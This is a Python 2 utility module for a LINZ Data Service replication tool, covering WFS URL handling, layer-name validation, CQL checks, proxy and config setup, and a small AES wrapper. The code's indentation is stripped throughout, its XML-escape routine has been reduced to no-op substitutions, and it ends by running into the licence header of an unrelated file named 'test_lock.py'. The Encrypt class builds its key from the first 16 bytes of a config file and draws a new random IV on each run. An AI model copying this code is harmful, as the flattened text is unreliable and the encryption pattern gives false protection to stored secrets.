from urllib2 import urlopen, build_opener, install_opener, ProxyHandler
from contextlib import closing
from StringIO import StringIO
from lxml import etree
from multiprocessing import Process, Queue
from functools import wraps, partial
#ldslog = LDSUtilities.setupLogging()
mainlog = 'DEBUG'
ldslog = logging.getLogger(mainlog)
LDS_READ_TIMEOUT = 300 # 5min
MACRON_SUBST = {'ā':'a','ē':'e','ī':'i','ō':'o','ū':'u'}
class ReadTimeoutException(Exception):
def __init__(self,em,ll=ldslog.error): ll('{} - {}'.format(type(self).__name__,em))
class LDSUtilities(object):
'''Does the LDS related stuff not specifically part of the datastore'''
LDS_VX_PREFIX = 'v:x'
#wfs2.0 prefixes
LDS_LL_PREFIX = 'linz:layer-'
LDS_DL_PREFIX = 'data.linz.govt.nz:layer-'
LDS_DT_PREFIX = 'data.linz.govt.nz:table-'
LDS_DX_PREFIX = 'data.linz.govt.nz:'
LDS_ME_PREFIX = 'mfe:layer-'
LORT = ['table','layer'] #variations on idp for finding layer/table names in LC
LDS_PREFIXES = (LDS_VX_PREFIX,LDS_LL_PREFIX,LDS_DL_PREFIX,LDS_DT_PREFIX,LDS_ME_PREFIX)
@staticmethod
def getLDSIDPrefix(ver,svc):
from lds.DataStore import UnsupportedServiceException
if svc=='WFS':
if ver in ('1.0.0','1.1.0','1.0','1.1'):
return LDSUtilities.LDS_VX_PREFIX
elif ver in ('2.0.0','2.0'):
#return LDSUtilities.LDS_LL_PREFIX
return LDSUtilities.LDS_DX_PREFIX
else:
raise UnsupportedServiceException('Only WFS versions 1.0, 1.1 and 2.0 are supported')
else:
raise UnsupportedServiceException('Only WFS is supported at present')
@staticmethod
def adjustWFS2URL(url,ver):
if ver == '2.0.0':
url = re.sub('wfs.','',url)#+'services;key='
ldslog.warn('\'wfs.\' deleted from URL to comply with LDS WFS2.0 requirements')
return url
@staticmethod
def splitLayerName(layername):
'''Splits a layer name typically in the format v:x### into /v/x### for URI inclusion'''
#return "/"+"/".join(layername.split(":"))
return "/"+re.sub(":","/",layername)
LDS_VXPATH = splitLayerName.__func__(LDS_VX_PREFIX)
LDS_LLPATH = splitLayerName.__func__(LDS_LL_PREFIX)#?
LDS_MEPATH = splitLayerName.__func__(LDS_ME_PREFIX)#?
LDS_IDPATHS = (LDS_VXPATH,LDS_LLPATH,LDS_MEPATH)
@staticmethod
def standardiseLayername(layername):
'''Removes changeset identifier from layer name and adds 'the' prefix if its not already there'''
if not re.search(LDSUtilities.LDS_DX_PREFIX,layername): layername = '{}{}'.format(LDSUtilities.LDS_DX_PREFIX,layername)
return layername.rstrip("-changeset")
@staticmethod
def checkDateFormat(xdate):
'''Checks a date parameter conforms to yyyy-MM-ddThh:mm:ss format'''
#why not just use... datetime.strptime(xdate,'%Y-%m-%dT%H:%M:%S')
if type(xdate) is str:
if re.search('^\d{4}\-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}$',xdate):
return xdate
elif re.search('^\d{4}\-\d{2}-\d{2}$',xdate):
return xdate+"T00:00:00"
return None
# 772 time test string
# http://wfs.data.linz.govt.nz/ldskey/v/x772-changeset/wfs?service=WFS&version=1.0.0&request=GetFeature&typeName=v:x772-changeset&viewparams=from:2012-09-29T07:00:00;to:2012-09-29T07:30:00&outputFormat=GML2
@staticmethod
def checkLayerName(lconf,lname):
'''Makes sure a layer name conforms to v:x format which exists or matches a layername'''
from lds.DataStore import InvalidLayerException
if type(lname) in (str,unicode):
lname = LDSUtilities.recode(lname)
#if its an ID (v:x etc) and it matches a configured id return it
if LDSUtilities.checkLayerNameValidity(lname) and lname in [l[0] for l in lconf.getLayerNames()]: return lname
#if its a name eg (NZ Special Points) return matching ID
lid = lconf.findLayerIdByName(lname)
if lid: return lid
else: raise InvalidLayerException('Cannot find Layer, '+lname)
else:
raise InvalidLayerException('Layer name not a string, '+str(lname))
return None
@staticmethod
def checkLayerNameValidity(lname):
'''check whether provided layer name is v:x, linz:layer- or mfe:layer-'''
return True if [x for x in LDSUtilities.LDS_PREFIXES if re.search('^{}\d+$'.format(x),lname)] else False
@staticmethod
def interceptSystemProxyInfo(proxyinfo,sys_ref):
(ptype, host, port, auth, usr, pwd) = proxyinfo
if LDSUtilities.assessNone(ptype) == sys_ref:
#system, read from env/reg
if os.name == 'nt':
#windows
from lds.WinUtilities import Registry as WR
(_,host,port) = WR.readProxyValues()
else:
#unix etc
hp = os.environ['http_proxy']
rm = re.search('http://([a-zA-Z0-9_\.\-]+):(\d+)',hp)
host = rm.group(1)
port = rm.group(2)
return {'TYPE':ptype, 'HOST':host, 'PORT':port, 'AUTH':auth, 'USR':usr, 'PWD':pwd}
@staticmethod
def getLayerNameFromURL(url):
'''checks for both /v/xNNN and v:xNNN occurrences and whether they're the same'''
from DataStore import MalformedConnectionString
l1 = [re.search(x+'(\d+)',url,flags=re.IGNORECASE) for x in LDSUtilities.LDS_IDPATHS if re.search(x+'(\d+)',url,flags=re.IGNORECASE)][0]
l2 = [re.search('typeName='+x+'(\d+)',url,flags=re.IGNORECASE) for x in LDSUtilities.LDS_PREFIXES if re.search('typeName='+x+'(\d+)',url,flags=re.IGNORECASE)][0]
if l1 is None or l2 is None:
raise MalformedConnectionString('Cannot extract correctly formatted layer strings from URI')
else:
l1 = l1.group(1)
l2 = l2.group(1)
if l1!=l2:
raise MalformedConnectionString('Layer specifications in URI differ; '+str(l1)+'!='+str(l2))
pref = [x for x in LDSUtilities.LDS_PREFIXES if re.search('typeName='+x+'(\d+)',url,flags=re.IGNORECASE)][0]
return pref+str(l1)
@staticmethod
def checkHasChangesetIdentifier(url):
'''Check whether URL contains changeset id'''
c1 = [x for x in LDSUtilities.LDS_IDPATHS if re.search(x+'\d+-changeset',url,flags=re.IGNORECASE)]
c2 = [x for x in LDSUtilities.LDS_PREFIXES if re.search('typeName='+x+'\d+-changeset',url,flags=re.IGNORECASE)]
return True if c1 and c2 else False#return c1 and c2
@staticmethod
def getDateStringFromURL(fort,url):
'''Parse a selected date string from a user supplied URL. Can return none as that would indicate non incremental'''
#yeah thats right, ForT = F(rom) or T(o)
udate = re.search(fort+':(\d{4}-\d{2}-\d{2}(T\d{2}:\d{2}:\d{2})*)',url)
return udate
@staticmethod
def xmlEscape(url):
'''Simple XML escaping regex used to properly format WFS URLS (wfs specs ask for it but it doesn't seem to be needed)'''
#first 4, simple replace: "=" '=' <=< >=> &=&
url = re.sub('"','"',url)
url = re.sub('\'',''',url)
url = re.sub('<','<',url)
url = re.sub('>','>',url)
#them match & but not anything that has already been escaped
#the original string could also contain escaped chars so we have to do skip escapes anyway
return re.sub('&(?!amp;|apos;|quot;|lt;|gt;)','&',url)
@staticmethod
def percentEncode(url):
'''Simple http bracket/comma escaping regex used to properly format WFS URLS'''
#this is the full list but we should only need a small subset of these, i.e. brackets, spaces and commas
# ! # $ & ' ( ) * + , / : ; = ? @ [ ]
#%20 %21 %23 %24 %26 %27 %28 %29 %2A %2B %2C %2F %3A %3B %3D %3F %40 %5B %5D
fpe = {' ':'%20','!':'%21','#':'%23','$':'%24','&':'%26',"'":'%27','\(':'%28','\)':'%29','\*':'%2A','\+':'%2B',',':'%2C','/':'%2F',':':'%3A',';':'%3B','=':'%3D','\?':'%3F','@':'%40','\[':'%5B','\]':'%5D'}
rpe = {' ':'%20','\(':'%28','\)':'%29',',':'%2C'}
for k in rpe:
url = re.sub(k,rpe[k],url)
#url = re.sub('\(','%28',url)
#url = re.sub('\)','%29',url)
#url = re.sub(',','%2C',url)
#url = re.sub(' ','%20',url)
return url
@staticmethod
def reVersionURL(url,newversion='1.1.0'):
'''Because there is sometimes a problem with WFS <1.0.0, esp GetFeatureCount, change to WFS 1.1.0 (or whatever the user wants)'''
ldslog.warn('Rewriting URI version to '+str(newversion))
return re.sub('&version=[0-9\.]+','&version='+str(newversion),url)
@staticmethod
def containsOnlyAlphaNumeric(anstr):
'''Checks for non alphnumeric characters in a string, for schema/table name testing'''
#also allows underscore
return re.search('[^a-zA-Z0-9_]',anstr) is None
@staticmethod
def checkCQL(cql):
'''Since CQL commands are freeform strings we need to try and validate at least the most basic errors. This is very simple
RE matcher that just looks for valid predicates... for now. Won't stop little Bobby Tables
<predicate> ::= <comparison predicate> | <text predicate> | <null predicate> | <temporal predicate> | timestamp merge<classification predicate> | <existence_predicate> | <between predicate> | <include exclude predicate>
LDS expects the following;
Was expecting one of:
"not" ...
"include" ...
"exclude" ...
"(" ...
"[" ...
"id" ...
"in" ...
<IDENTIFIER> ...
"-" ...
<INTEGER_LITERAL> ...
<FLOATING_LITERAL> ...
<STRING_LITERAL> ...
<STRING_LITERAL> "*" ...
<STRING_LITERAL> "/" ...
<STRING_LITERAL> "+" ...
<STRING_LITERAL> "-" ...
<STRING_LITERAL> "not" ...
<STRING_LITERAL> "like" ...
<STRING_LITERAL> "exists" ...
<STRING_LITERAL> "does-not-exist" ...
<STRING_LITERAL> "is" ...
<STRING_LITERAL> "between" ...
<STRING_LITERAL> "before" ...
<STRING_LITERAL> "after" ...
<STRING_LITERAL> "during" ...
<STRING_LITERAL> "=" ...
<STRING_LITERAL> ">" ...
<STRING_LITERAL> "<" ...
<STRING_LITERAL> ">=" ...
<STRING_LITERAL> "<=" ...
<STRING_LITERAL> "<>"
'''
v = 0
#comp pred
if re.match('.*(?:!=|=|<|>|<=|>=)',cql):
v+=1
#text pred
if re.match('.*(?:not\s*)?like.*',cql,re.IGNORECASE):
v+=2
#null pred
if re.match('.*is\s*(?:not\s*)?null.*',cql,re.IGNORECASE):
v+=4
#time pred
if re.match('.*(?:before|during|after)',cql,re.IGNORECASE):
v+=8
#clsf pred, not defined
#exst pred
if re.match('.*(?:does-not-)?exist',cql,re.IGNORECASE):
v+=32
#btwn pred
if re.match('.*(?:not\s*)?between',cql,re.IGNORECASE):
v+=64
#incl pred
if re.match('.*(?:include|exclude)',cql,re.IGNORECASE):
v+=128
#geo predicates just for good measure, returns v=16 overriding classification pred
if re.match('.*(?:equals|disjoint|intersects|touches|crosses|within|contains|overlaps|bbox|dwithin|beyond|relate)',cql,re.IGNORECASE):
v+=16
ldslog.debug("CQL check:"+cql+":"+str(v))
if v>0:
return cql
else:
return ""
@staticmethod
def precedence(first,second,third):
'''Decide which CQL filter to apply based on scope and availability'''
'''Generally assume; CommandLine > Config-File > Layer-Properties but maybe its better for individual layers to override a global setting... '''
if LDSUtilities.assessNone(first):
return first
elif LDSUtilities.assessNone(second):
return second
elif LDSUtilities.assessNone(third):
return third
return None
@staticmethod
def extractFields(feat):
'''Extracts named fields from a layer config feature'''
'''Not strictly independent but common and potentially used by a number of other classes'''
try:
id = feat.GetField('ID')
except:
ldslog.debug("LayerSchema: Can't read Feature ID")
id = None
try:
pkey = feat.GetField('PKEY')
except:
ldslog.debug("LayerSchema: No Primary Key Column defined, default to 'ID'")
pkey = 'ID'
'''names are/can-be stored so we can reverse search by layer name'''
try:
name = feat.GetField('NAME')
except:
ldslog.debug("LayerSchema: No Name saved in config for this layer, returning ID")
name = None
'''names are/can-be stored so we can reverse search by layer name'''
try:
group = feat.GetField('CATEGORY')
except:
ldslog.debug("Group List: No Groups defined for this layer")
group = None
try:
gcol = feat.GetField('GEOCOLUMN')
except:
ldslog.debug("LayerSchema: No Geo Column defined, default to 'SHAPE'")
gcol = 'SHAPE'
try:
index = feat.GetField('INDEX')
except:
ldslog.debug("LayerSchema: No Index Column/Specification defined, default to None")
index = None
try:
epsg = feat.GetField('EPSG')
except:
#print "No Projection Transformation defined"#don't really need to state the default occurance
epsg = None
try:
lmod = feat.GetField('LASTMODIFIED')
except:
ldslog.debug("LayerSchema: No Last-Modified date recorded, successful update will write current time here")
lmod = None
try:
disc = feat.GetField('DISCARD')
except:
disc = None
try:
cql = feat.GetField('CQL')
except:
cql = None
return LayerConfEntry(id,pkey,name,group,gcol,epsg,lmod,disc,cql)
@staticmethod
def standardiseDriverNames(dname=''):
'''Returns standard identifier (defined by DRIVER_NAME) for different dests'''
dname = dname.lower()
from DataStore import DataStore
if re.match('pg|postgres',dname):
return DataStore.DRIVER_NAMES['pg']
elif re.match('ms|microsoft|sqlserver',dname):
return DataStore.DRIVER_NAMES['ms']
elif re.match('sl|sqlite|spatialite',dname):
return DataStore.DRIVER_NAMES['sl']
elif re.match('fg|filegdb|esri',dname):
return DataStore.DRIVER_NAMES['fg']
elif re.match('wfs|lds',dname):
#since a user could ask for lds meaning wfs though this will have to change if we implement wms etc TODO
from lds.WFSDataStore import WFSDataStore
return WFSDataStore.DRIVER_NAME
return None
@staticmethod
def getRuntimeEnvironment():
for line in traceback.format_stack():
if re.search('qgis', line.strip()): return 'QGIS'
return 'STANDALONE'
@staticmethod
def timedProcessRunner(process,args,T):
'''For processes that are inclined to hang, stick them in new process and time them out'''
timeout = T if T else LDS_READ_TIMEOUT
pn = process.__name__
#HACK to get around windows no-method-pickling rule
if re.search('readLDS',pn) and re.search('win',sys.platform): process = _readLDS
q = Queue()
p = Process(name=pn,target=process,args=(args,q))
p.daemon = False
ldslog.debug('Timed Process {} on {} with {}'.format(process.__name__,sys.platform,args))
p.start()
p.join(timeout=timeout)
if p.is_alive():
ldslog.debug('Process {} Timeout Exceeded'.format(pn))
p.terminate()
q.close()
fn = args[0].__name__ if hasattr(args[0], '__call__') else pn
raise ReadTimeoutException('No Response from {} with timeout={}s'.format(fn,timeout))
else:
res = q.get()
q.close()
if isinstance(res,Exception):
raise ReadTimeoutException(LDSUtilities.errorMessageTranslate(res))
return res
@staticmethod
def wrapWorker(fanda,q):
'''Generic wrapper function returning results via queue. Used for system calls
1. Calls to wF must provide the function-to-call as the first arg in a tuple, remaining args are funcion args
2. Because we cant raise an error to the main thread pass exception back in queue
3. Unable to pass back data in queue, cannot Pickle. SwigPy specifically'''
#print '>>fanda',fanda
try:
q.put(fanda[0](*fanda[1:]) if len(fanda)>1 else q.put(fanda[0]()))
except Exception as e:
q.put(e)
return
@staticmethod
#also thwarted by SwigPy - pickle
def wrapSTOWorker(sto,q):
'''Generic wrapper function returning results via queue. Used for system calls
1. Calls to wF must provide the function-to-call as the first arg in a tuple, second arg is return object, remaining args are funcion args
2. Because we cant raise an error to the main thread pass exception back in queue
3. Unable to pass back data in queue, cannot Pickle. SwigPy specifically'''
#print '>>sto',sto
try:
sto.setResult(sto.method(*sto.args) if sto.args else sto.method())
q.put(sto)
except Exception as e:
q.put(e)
return
@staticmethod
def readLDS(up,q):
'''Simple LDS reader to be used in a timed worker thread context'''
(u,p) = up
ldslog.debug("LDS URL {} using Proxy {}".format(u,p))
if LDSUtilities.isProxyValid(p): install_opener(build_opener(ProxyHandler(p)))
with closing(urlopen(u)) as lds:
q.put(lds.read())
@staticmethod
def isProxyValid(pxy):
'''Return TF whether the proxy definition is any good. TODO add other conditions'''
return LDSUtilities.assessNone(pxy) and pxy.values()!=[':']
@staticmethod
def convertBool(sbool):
'''Returns the bool representation of a T/F string or failing that whatever bool func thinks'''
if isinstance(sbool,str) or isinstance(sbool,unicode):
if sbool.lower() in ['true','t','yes','y']:
return True
elif sbool.lower() in ['false','f','no','n']:
return False
return bool(sbool)
@staticmethod
def assessNone(nstr):
'''Doesn't cover all possibilities but accounts for most read-from-file (string) problems. Lists treated as ANY(None)->None'''
#for when integers slip through and zeroes get represented as none
if isinstance(nstr,int):
ldslog.warn('Converting Integer {} to String for null comparison'.format(nstr))
return str(nstr)
if isinstance(nstr,tuple) or isinstance(nstr,list):
return None if any(not LDSUtilities.assessNone(i) for i in nstr) else nstr
elif isinstance(nstr,dict):
#Case for dicts that have no valid values, may not be whats wanted
return None if any(not LDSUtilities.assessNone(i) for i in nstr.values()) else nstr
elif isinstance(nstr,str) and (nstr == 'None' or nstr == '' or all(i in whitespace for i in nstr)):
return None
elif isinstance(nstr,unicode) and (nstr == u'None' or nstr == u'' or all(i in whitespace for i in nstr)):
return None
#if its already none this will return itself
return nstr
'''Enumeration method'''
@staticmethod
def enum(*sequential, **named):
#http://stackoverflow.com/questions/36932/how-can-i-represent-an-enum-in-python
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.iteritems())
enums['reverse'] = reverse
return type('Enum', (), enums)
@staticmethod
def setupLogging(lf=mainlog,ll=logging.DEBUG,ff=1):
formats = {1:'%(asctime)s - %(levelname)s - %(module)s %(lineno)d - %(message)s',
2:':: %(module)s %(lineno)d - %(message)s',
3:'%(asctime)s,%(message)s'}
log = logging.getLogger(lf)
log.setLevel(ll)
path = os.path.normpath(os.path.join(os.path.dirname(__file__), "../log/"))
if not os.path.exists(path):
os.mkdir(path)
df = os.path.join(path,lf.lower()+'.log')
fh = logging.FileHandler(df,'w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(formats[ff])
fh.setFormatter(formatter)
log.addHandler(fh)
return log
@staticmethod
def standardiseLayerConfigName(layerprefix):
'''Standardise to a layer config file name and check if it exists'''
LP = '.layer.properties'
layerprefix = LDSUtilities.standardiseDriverNames(layerprefix).lower()
base = os.path.basename(layerprefix)
filename = base + ('' if re.search(LP+'$', base) else LP)
return os.path.abspath(os.path.join(os.path.dirname(__file__),'../conf/',filename))
@classmethod
def checkForLayerConfig(cls,layerprefix):
'''Get standardised user config file name and check if it exists'''
lpath = cls.standardiseLayerConfigName(layerprefix)
return lpath if os.path.exists(lpath) else None
@staticmethod
def standardiseUserConfigName(userprefix):
'''Standardise to a user config file name'''
UP = '.conf'
base = os.path.basename(str(userprefix))
filename = base + ('' if re.search(UP+'$', base) else UP)
return os.path.abspath(os.path.join(os.path.dirname(__file__),'../conf/',filename))
@classmethod
def checkForUserConfig(cls,userprefix):
'''Get standardised user config file name and check if it exists'''
upath = cls.standardiseUserConfigName(userprefix)
return upath if os.path.exists(upath) else None
@staticmethod
def errorMessageTranslate(msg):
'''Convenience function to provide more informative error messages'''
searchreplace = [('Failed\swriting\sbody','1.Unable to fetch data over network connection. Possible timeout'),
('something illegible','2.something sensible')]
newmsg = [a[1] for a in searchreplace if re.search(a[0],msg,re.IGNORECASE)]
return '*{}*\n{}'.format(newmsg[0],msg) if newmsg else msg
@staticmethod
def sanitise(name):
'''Manually substitute potential table naming errors implemented as a common function to retain naming convention across all outputs.
No guarantees are made that this feature won't cause naming conflicts e.g. A-B-C -> a_b_c <- a::{b}::c'''
#append _ to name beginning with a number (NB \A = ^ for non multiline)
if re.match('\A\d',name):
name = "_"+name
#replace unwanted chars with _ and compress multiple and remove trailing
sanitised = re.sub('_+','_',re.sub('[ \-,.\\\\/:;{}()\[\]]','_',name.lower())).rstrip('_')
#unexpected name substitutions can be a source of bugs, log as debug
ldslog.debug("Sanitise: raw="+name+" name="+sanitised)
return sanitised
'''
NOTE
unicode.encode() -> bytes
bytes.decode() -> unicode
'''
@staticmethod
def recodeForDriver(ustr,driver=None,code='decode'):
'''Change encoding for drivers that dont support unicode. Not used/needed anymore?'''
if driver=='fg': return ustr.encode('iso-8859-1')
if driver=='pg': return ustr.encode('iso-8859-1')
return ustr.encode('utf-8')
@staticmethod
def recode(val,code='utf8',uflag='decode'):
'''Does unicode decoding (encoding) or just strips out macronated chars'''
tv = ( type(val)==unicode )
if val:
if uflag == 'decode':
'''Decode turning ascii coded strings into unicode'''
return val if tv else val.decode(code)
elif uflag == 'encode':
'''Encode, converting unicode into ascii'''
return val.encode(code) if tv else val
elif uflag=='subst':
'''Macron substitutions used in CreateLayer but keeps val as unicode'''
repx = dict((re.escape(k), v) for k, v in MACRON_SUBST.iteritems())
pattern = re.compile("|".join(repx.keys()))
return pattern.sub(lambda m: repx[re.escape(m.group(0))], val)
elif uflag=='compat':
'''Make the string really compatible, substitute macrons and encode then str()'''
return str(LDSUtilities.recode(LDSUtilities.recode(val,code,uflag='encode'),code,uflag='subst'))
return val
@staticmethod
def treeDecode(lcl,code='utf8',uflag='decode'):
'''Convenience list element-by-element decoder'''
#return [LDSUtilities.treeDecode(i, code) if isinstance(i,list) or isinstance(i, tuple) else ((i.decode(code) if uflag=='decode' else i.encode(code)) if i else None) for i in lcl]
return [LDSUtilities.treeDecode(i,code,uflag) if isinstance(i,(list,tuple)) else (LDSUtilities.recode(i,code,uflag) if i else None) for i in lcl]
@staticmethod
def treeEncode(lcl,code='utf8',eord=False):
return LDSUtilities.treeDecode(lcl, code, eord)
@staticmethod
def unicodeCompare(str1,str2):
return LDSUtilities.recode(str1) == LDSUtilities.recode(str2)
@staticmethod
def sysPathAppend(plist):
'''Append library paths to sys.path if missing'''
for p in [os.path.realpath(p) for p in plist]:
if p not in sys.path:
sys.path.insert(0, p)
class DirectDownload(object):
def __init__(self,url,file):
self.url = url
self.file = file
def download(self):
urllib.urlretrieve(self.url, self.file)
class FileResolver(etree.Resolver):
def resolve(self, url, pubid, context):
return self.resolve_filename(url, context)
class ConfigInitialiser(object):
'''Initialises configuration, for use at first run'''
@staticmethod
def buildConfiguration(capsurl, wfs_ver,jorf, idp):
'''Given a destination DS use this to select an XSL transform object and generate an output document that will initialise a new config file/table'''
#file name subst for testing
#capsurl='http://data.linz.govt.nz/services;key=<api-key>/wfs?service=WFS&version=2.0.0&request=GetCapabilities'
#capsurl='http://data.linz.govt.nz/services;key=<api-key>/wfs?service=WFS&version=1.1.0&request=GetCapabilities'
#xslfile='~/git/LDS/LDSReplicate/conf/getcapabilities-wfs2.0.json.xsl'
#xslfile='~/git/LDS/LDSReplicate/conf/getcapabilities-wfs1.1.json.xsl'
parser = etree.XMLParser(recover=True, huge_tree=True)
parser.resolvers.add(FileResolver())
wfspart = '-wfs{}'.format(wfs_ver)
jorfpart = 'json' if jorf else 'file'
xslfile = os.path.join(os.path.dirname(__file__), '../conf/getcapabilities{}.{}.xsl'.format(wfspart,jorfpart))
xml = etree.parse(capsurl,parser)
xsl = etree.parse(xslfile,parser)
#this is a problem that seems to only affect eclipse, running from CL or the final bin is fine
#FT = xml.findall('//{http://www.opengis.net/wfs/2.0}FeatureType')
#KY = xml.findall('//{http://www.opengis.net/ows/1.1}Keywords/{http://www.opengis.net/ows/1.1}Keyword')
#TX = xsl.findall('//{http://www.w3.org/1999/XSL/Transform}text')
#print 'FT',len(FT)#,FT,[l.text for l in FT]
#print 'KY',len(KY)#,KY,[l.text for l in KY]
#print 'TX',len(TX)#,TX,[l.text for l in TX]
transform = etree.XSLT(xsl)
result = transform(xml,profile_run=True)
ldslog.info('Parsed GC '+unicode(result)+'/'+str(result.xslt_profile))
return (ConfigInitialiser._hackPrimaryKeyFieldJSON if jorf else ConfigInitialiser._hackPrimaryKeyFieldCP)(unicode(result),idp)
@staticmethod
def cleanCP(cp):
'''Make sure the ConfigParser is empty... even needed?'''
for sec in cp.sections():
cp.remove_section(sec)
@staticmethod
def _hackPrimaryKeyFieldCP(cpdoc,idp,csvfile=os.path.join(os.path.dirname(__file__),'../conf/ldspk.csv')):
'''temporary hack method to rewrite the layerconf primary key field for ConfigParser file types using Koordinates supplied PK CSV'''
import io
from ConfigParser import ConfigParser, NoSectionError
cp = ConfigParser()
#read CP from GC doc
cp.readfp(io.BytesIO(LDSUtilities.recode(cpdoc,uflag='encode')))#str(cpdoc
#read the PK list writing any PK's found into CP
for item in ConfigInitialiser.readCSV(csvfile):
try:
ky = item[2].replace('ogc_fid','').replace('"','').lstrip()
for lt in LDSUtilities.LORT:
ly = str(idp+lt+'-'+item[0])
#cant have a pk named ogc_fid since this is created automatically by the database, creating a new one crashes
if cp.has_section(ly):
cp.set(ly,'pkey',ky)
ldslog.debug('Setting PK on layer. '+ly+'//'+ky)
break
else:
raise NoSectionError('No section matching '+idp+'|'.join(LDSUtilities.LORT)+'-'+item[0])
except NoSectionError as nse:
ldslog.warn('PK hack CP: '+str(nse)+ly+'//'+ky)
#CP doesn't have a simple non-file write method?!?
cps = "# LDS Layer Properties Initialiser - File\n"
for section in cp.sections():
#ldslog.critical('writing >>>'+str(section))
cps += "\n["+str(section)+"]\n"
for option in cp.options(section):
cps += str(option)+": "+str(cp.get(section, option))+"\n"
return cps
@staticmethod
def _hackPrimaryKeyFieldJSON(jtext,idp,csvfile=os.path.join(os.path.dirname(__file__),'../conf/ldspk.csv')):
'''temporary hack method to rewrite the layerconf primary key field in JSON responses'''
import json
jdata = json.loads(jtext)
for item in ConfigInitialiser.readCSV(csvfile):
for jline in jdata:
if idp+item[0] == str(jline[0]):
jline[1] = item[2].replace('"','').lstrip()
return json.dumps(jdata)
@staticmethod
def readCSV(csvfile=os.path.join(os.path.dirname(__file__),'../conf/ldspk.csv')):
'''Look for PK assigments in the Koordinates supplied csv'''
import csv
res = []
with open(csvfile, 'rb') as csvtext:
reader = csv.reader(csvtext, delimiter=',', quotechar='"')
reader.next()
for line in reader:
res.append(line)
return res
@staticmethod
def getConfFiles(confdir=os.path.join(os.path.dirname(__file__),'../conf/')):
from lds.ReadConfig import MainFileReader as MF
return sorted([f.split('.')[0] for f in os.listdir(confdir) if re.search('(?!^'+MF.DEFAULT_MF+'$)^.+\.conf$',f)])
class SUFIExtractor(object):
'''XSL parser to read big int columns returning a dict of id<->col matches'''
@staticmethod
def readURI(xml,colname):
p = os.path.join(os.path.dirname(__file__), '../conf/sufiselector.xsl')
with open(p,'r') as sufireader:
converter = sufireader.read()
xslt = etree.XML(converter.replace('#REPLACE',colname))
transform = etree.XSLT(xslt)
doc = etree.parse(StringIO(xml))
res = transform(doc)
sufi = ast.literal_eval(str(res))
#ldslog.debug(sufi)
return sufi
class FeatureCounter(object):
'''XSL parser to read big int columns returning a dict of id<->col matches'''
@staticmethod
def readCount(xml):
p = os.path.join(os.path.dirname(__file__), '../conf/featurecounter.xsl')
with open(p,'r') as featcount:
converter = featcount.read()
xslt = etree.XML(converter)
transform = etree.XSLT(xslt)
doc = etree.parse(StringIO(xml))
res = transform(doc)
fcval = ast.literal_eval(str(res))
return fcval
class Encrypt(object):
from lds.ReadConfig import MainFileReader
ENC_PREFIX = "ENC:"
#SbO, not secret at all actually
p = LDSUtilities.standardiseUserConfigName(MainFileReader.DEFAULT_MF)
with open(p,'r') as confile:
lds = confile.readline(16)
from Crypto import Random
ivstr = Random.get_random_bytes(16)
@classmethod
def secure(cls,plaintext):
import base64
from Crypto.Cipher import AES
aes = AES.new(cls.lds, AES.MODE_CBC, cls.ivstr)
sec = base64.b64encode(aes.encrypt(Encrypt._pad(plaintext)))
return sec
@classmethod
def unSecure(cls,sectext):
import base64
from Crypto.Cipher import AES
aes = AES.new(cls.lds, AES.MODE_CBC, cls.ivstr)
plain = Encrypt._strip(aes.decrypt(base64.b64decode(sectext)))
return plain
@staticmethod
def _pad(sectext):
import random
pn = 15-len(sectext)%16
pad = '' if pn==0 else str(random.randint(10**(pn-1),10**pn-1))
return sectext+pad+hex(pn)[2:]#.lstrip('0x') doesn't work for 0x0
@staticmethod
def _strip(padtext):
pn = padtext[-1]
return padtext[:len(padtext)-int(pn,16)-1]
#this is the only class that emits LCE objects and a a utility module we don't want to be adding dependencies so LCE belongs here
class LayerConfEntry(object):
'''Storage class for layer config info'''
def __init__(self,id,pkey,name,group,gcol,epsg,lmod,disc,cql):
self.id = id
self.pkey = pkey
self.name = name
self.group = group
self.gcol = gcol
self.epsg = epsg
self.lmod = lmod
self.disc = disc
self.cql = cql
self.ascii_name = LDSUtilities.recode(self.name,uflag='subst')
def __str__(self):
return 'LCE {}={} - {}'.format(self.pkey if LDSUtilities.assessNone(self.pkey) else '_id', self.id, self.name)
def _readLDS(up,q):
'''Simple LDS reader to be used in a timed worker thread context.
COPY OF LDSU.readLDS METHOD'''
(u,p) = up
ldslog.debug("_LDS URL {} using Proxy {}".format(u,p))
if LDSUtilities.isProxyValid(p): install_opener(build_opener(ProxyHandler(p)))
with closing(urlopen(u)) as lds:
q.put(lds.read())
class Debugging(object):
#simple decorator logging called func
@classmethod
def dmesg(cls,func=None, prefix=''):
if func is None:
return partial(Debugging.dmesg, prefix=prefix)
msg = '<m{}> {}'.format(prefix,cls._qname(func.__name__))
@wraps(func)
def wrapper(*args, **kwargs):
ldslog.info(msg)
return func(*args, **kwargs)
return wrapper
#logs function args
@classmethod
def darg(cls,func=None, prefix=''):
if func is None:
return partial(Debugging.darg, prefix=prefix)
msg = '<a{}> {} '.format(prefix,cls._qname(func.__name__))
@wraps(func)
def wrapper(*args, **kwargs):
ldslog.info(msg+str(args)+'//'+str(kwargs))
return func(*args, **kwargs)
return wrapper
#logs result of func
@classmethod
def dres(cls,func=None, prefix=''):
if func is None:
return partial(Debugging.dres, prefix=prefix)
msg = '<r{}> {} '.format(prefix,cls._qname(func.__name__))
@wraps(func)
def wrapper(*args, **kwargs):
res = func(*args, **kwargs)
ldslog.info(msg+str(res))
return res
return wrapper
@classmethod
def _qname(cls,fn):
'''Replacement for func.__qualname__ from Py3'''
try: gn = globals()[fn]
except KeyError: gn = ''
return '{}.{}'.format(fn,gn)
# class STObj(object):
# def __init__(self,m,a):
# self.method = m
# self.args = a
# self.success = False
#
# def setResult(self,res):
# self.res = res
#
# def getResult(self):
# return self.res
# def _pickle_method(method):
# func_name = method.im_func.__name__
# obj = method.im_self
# cls = method.im_class
# return _unpickle_method, (func_name, obj, cls)
#
# def _unpickle_method(func_name, obj, cls):
# for cls in cls.mro():
# try:
# func = cls.__dict__[func_name]
# except KeyError:
# pass
# else:
# break
# return func.__get__(obj, cls)
#
# import copy_reg
# import types
#
# copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)
|
test_lock.py
|
"""
Copyright (c) 2008-2022, Jesus Cea Avion <jcea@jcea.es>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
